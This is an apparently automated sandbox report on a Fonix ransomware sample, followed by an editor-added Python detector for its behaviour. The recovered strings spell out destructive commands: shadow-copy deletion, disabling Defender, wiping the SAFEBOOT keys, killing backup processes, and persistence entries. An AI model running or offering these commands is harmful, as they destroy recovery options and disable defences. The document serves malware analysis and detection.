Source: fM498uO16Z.exe | Virustotal: Detection: 56% |
Source: fM498uO16Z.exe | Metadefender: Detection: 22% |
Source: fM498uO16Z.exe | ReversingLabs: Detection: 55% |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011D89D0 CryptReleaseContext,_Init_thread_footer, | 0_2_011D89D0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011D8290 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy, | 0_2_011D8290 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011D8AC0 CryptGenRandom,CryptReleaseContext, | 0_2_011D8AC0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011D8400 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext, | 0_2_011D8400 |
Source: fM498uO16Z.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: | Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe |
Source: fM498uO16Z.exe | String found in binary or memory: https://code.jquery.com/jquery-latest.js |
Source: fM498uO16Z.exe | String found in binary or memory: https://uupload.ir/files/g510_windows_10.gif |
Source: fM498uO16Z.exe | String found in binary or memory: https://www.who.int |
Source: Yara match | File source: fM498uO16Z.exe, type: SAMPLE |
Source: Yara match | File source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY |
Source: Yara match | File source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE |
Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp | Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet |
Source: fM498uO16Z.exe | Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet |
Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp | Binary or memory string: How To Decrypt Files.hta\Help.txt |
Source: fM498uO16Z.exe | Binary or memory string: How To Decrypt Files.hta\Help.txt |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0122F14C | 0_2_0122F14C |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011B31B0 | 0_2_011B31B0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0122F9E4 | 0_2_0122F9E4 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_012289F8 | 0_2_012289F8 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0121F880 | 0_2_0121F880 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01229888 | 0_2_01229888 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0118E0E0 | 0_2_0118E0E0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011B1B40 | 0_2_011B1B40 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0121F394 | 0_2_0121F394 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0123A3FC | 0_2_0123A3FC |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0118CAD0 | 0_2_0118CAD0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01186D20 | 0_2_01186D20 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01195D40 | 0_2_01195D40 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011D9590 | 0_2_011D9590 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011813F0 | 0_2_011813F0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0122DD94 | 0_2_0122DD94 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011B4DD0 | 0_2_011B4DD0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01226400 | 0_2_01226400 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_012154A4 | 0_2_012154A4 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01221CAC | 0_2_01221CAC |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011884A0 | 0_2_011884A0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01185CD0 | 0_2_01185CD0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01190F80 | 0_2_01190F80 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01225784 | 0_2_01225784 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011B27D0 | 0_2_011B27D0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0121F618 | 0_2_0121F618 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011B4650 | 0_2_011B4650 |
Source: classification engine | Classification label: mal84.rans.evad.winEXE@1/0@0/0 |
Source: fM498uO16Z.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: fM498uO16Z.exe | Static file information: File size 1266688 > 1048576 |
Source: fM498uO16Z.exe | Static PE information: section name: _RDATA |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01189877 push rbp; iretd | 0_2_01189878 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011F10F0 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_011F10F0 |
Source: fM498uO16Z.exe | Binary or memory string:
OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEY
REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /F
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /F
REG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /F
REG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /F
START CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /Q
START CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXIT
START UP
ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"
SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /F
COPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"
COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE
XINOF.EXE
SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /F
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /F
REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /F
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /F
REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /F
FLAG C:\PROGRAMDATA\NONSNONSFLAG
BLACK LIST
MMS.EXE SCHEDUL2.EXE SCHEDHELP.EXE TIB_MOUNTER_MONITOR.EXE SQLIOSIM.EXE SQLAGENT.EXE SQLMAINT.EXE SQLSTUBSS.EXE CSRSS.EXE SQLCEIP.EXE MSTSC.EXE TASKMGR.EXE SQLSERVR.EXE QBIDPSERVICE.EXE SQLSERVER.EXE MSFTESQL.EXE SQLAGENT.EXE SQLBROWSER.EXE SQLWRITER.EXE ORACLE.EXE OCSSD.EXE DBSNMP.EXE SYNCTIME.EXE MYDESKTOPQOS.EXE AGNTSVC.EXE ISQLPPLUSSVC.EXE ISQLPUSSVC.EXE XFSSVCCON.EXE MYDESKTOPSERVICE.EXE OCAUTOUPDS.EXE ENCSVC.EXE FIREFOXCONFIG.EXE TBIRDCONFIG.EXE OCOMM.EXE MYSQLD.EXE MYSQLD-NT.EXE MYSQLD-OPT.EXE DBENG50.EXE SQBCORESERVICE.EXE EXCEL.EXE INFOPATH.EXE MSACCESS.EXE MSPUB.EXE ONENOTE.EXE OUTLOOK.EXE POWERPNT.EXE STREAM.EXE THEBAT.EXE THEBAT64.EXE THUNDERBIRD.EXE VISIO.EX |
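The command strings recovered from the sample (vssadmin shadow deletion, the SAFEBOOT and Defender registry edits, icacls, the taskkill chain, the ONLOGON scheduled task and the Run/RunOnce keys pointing at C:\PROGRAMDATA\XINOF.EXE) are the most detectable part of this report. The following is an added example by the editor, not part of the sandbox output or of the Fonix code: a small Python detector whose patterns follow those strings, run over constructed Sysmon-style process-creation events. The event fields, the benign entries and all PIDs other than 1068 (the sample's PID in the report) are made up for the example, and the ATT&CK technique IDs are the editor's mapping.

```python
"""Detect the host-tampering command lines recovered from the Fonix sample.

Editor-added example, not part of the sandbox report or the malware. Rules
follow the command strings listed in the report; events below are
constructed in the shape of Sysmon Event ID 1 fields, not real logs.
ATT&CK IDs are the editor's mapping (assumption).
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str  # ATT&CK ID, editor's mapping
    pattern: re.Pattern


RULES = (
    Rule("shadow_copy_deletion", "T1490",
         re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b.*/all", re.I)),
    Rule("safeboot_config_deleted", "T1562.001",
         re.compile(r"\breg(\.exe)?\s+delete\s+\S*\\control\\safeboot\b", re.I)),
    Rule("taskmgr_disabled", "T1562.001",
         re.compile(r"\breg(\.exe)?\s+add\s+.*policies\\system\s+/v\s+disabletaskmgr\b.*/d\s+1\b", re.I)),
    Rule("defender_disabled", "T1562.001",
         re.compile(r"windows defender\W+/v\s+disableantispyware\b.*/d\s+1\b", re.I)),
    Rule("everyone_full_control", "T1222.001",
         re.compile(r"\bicacls\s+\*\s+/grant\s+everyone:\(oi\)\(ci\)f\b", re.I)),
    Rule("backup_db_mail_kill", "T1489",
         re.compile(r"\btaskkill\b.*/im\s+(sql|veeam|msexchange|microsoft\.exchange|pvx|dbsrv)", re.I)),
    Rule("onlogon_task_from_programdata", "T1053.005",
         re.compile(r"\bschtasks\s+/create\b.*/sc\s+onlogon\b.*/tr\s+c:\\programdata\\", re.I)),
    Rule("run_key_to_programdata", "T1547.001",
         re.compile(r"\breg(\.exe)?\s+add\s+.*\\currentversion\\run(once)?\\?\s.*/d\s+c:\\programdata\\\S+\.exe", re.I)),
)

# Constructed events. PID 1068 is the sample's PID from the report; every
# other value is invented. Commands are in the case a logger would record.
SAMPLE_EVENTS = [
    {"ProcessId": 2100, "ParentProcessId": 1068, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c vssadmin Delete Shadows /All /Quiet"},
    {"ProcessId": 2112, "ParentProcessId": 1068, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg delete HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /F"},
    {"ProcessId": 2124, "ParentProcessId": 1068, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg add HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /F"},
    {"ProcessId": 2136, "ParentProcessId": 1068, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /F'},
    {"ProcessId": 2148, "ParentProcessId": 1068, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q"},
    {"ProcessId": 2160, "ParentProcessId": 1068, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c taskkill /T /F /IM sql* && taskkill /F /T /IM veeam* && exit"},
    {"ProcessId": 2172, "ParentProcessId": 1068, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /sc onlogon /tn Fonix /tr C:\ProgramData\xinof.exe /ru system /rl highest /f"},
    {"ProcessId": 2184, "ParentProcessId": 1068, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\ProgramData\xinof.exe /F'},
    # Benign administration that must not fire.
    {"ProcessId": 3000, "ParentProcessId": 900, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": r"vssadmin list shadows"},
    {"ProcessId": 3001, "ParentProcessId": 900, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /sc daily /tn Backup /tr C:\Tools\backup.exe /f"},
    {"ProcessId": 3002, "ParentProcessId": 900, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg add HKCU\Software\Contoso\App /v Verbose /t REG_DWORD /d 1 /f"},
]


def detect(events):
    """Return one hit per (event, rule) whose CommandLine matches."""
    hits = []
    for ev in events:
        for rule in RULES:
            if rule.pattern.search(ev["CommandLine"]):
                hits.append({"pid": ev["ProcessId"], "ppid": ev["ParentProcessId"],
                             "rule": rule.name, "technique": rule.technique})
    return hits


def triage(events, min_rules=3):
    """Group hits by parent PID and keep parents showing at least
    `min_rules` distinct behaviours: one reg or vssadmin call is noisy on
    its own, the combination is the pre-encryption stage of this sample.
    Grouping assumes the tampering commands share a direct parent."""
    by_parent = defaultdict(set)
    for hit in detect(events):
        by_parent[hit["ppid"]].add(hit["rule"])
    return {ppid: sorted(rules) for ppid, rules in by_parent.items()
            if len(rules) >= min_rules}


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"pid={hit['pid']} ppid={hit['ppid']} {hit['technique']} {hit['rule']}")
    print("flagged parents:", triage(SAMPLE_EVENTS))
```

The patterns key on the specific argument combinations seen in the dump (`/VA /F` on the SAFEBOOT key, `/RU SYSTEM` with an ONLOGON trigger, a Run value whose data lives under C:\ProgramData), so routine `vssadmin list shadows` or a daily backup task do not fire; the parent-PID aggregation is what turns eight individually weak signals into one alert.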